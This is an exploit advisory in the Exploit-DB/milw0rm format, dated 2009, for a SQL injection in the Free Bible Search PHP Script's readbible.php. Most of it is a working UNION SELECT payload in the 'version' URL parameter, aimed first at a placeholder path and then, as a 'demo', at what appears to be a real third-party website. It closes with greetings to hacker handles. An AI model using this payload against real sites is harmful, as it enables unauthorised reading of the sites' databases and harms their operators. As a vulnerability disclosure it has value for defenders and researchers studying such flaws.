Free Bible Search PHP Script - SQL Injection

EDB-ID:

7798


Author:

nuclear

Type:

webapps


Platform:

PHP

Date:

2009-01-15


#Free Bible Search PHP Script (readbible.php) SQL Injection Vulnerability


#Author: nuclear


#site:
http://www.seraphimtech.net/?q=node/6


#vuln:
http://localhost/[path]/readbible.php?version=kjv%20union%20select%20@@version--

#demo:
http://www.lordblessthee.com/bible/readbible.php?version=kjv%20union%20select%20@@version--

#greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar 

# milw0rm.com [2009-01-15]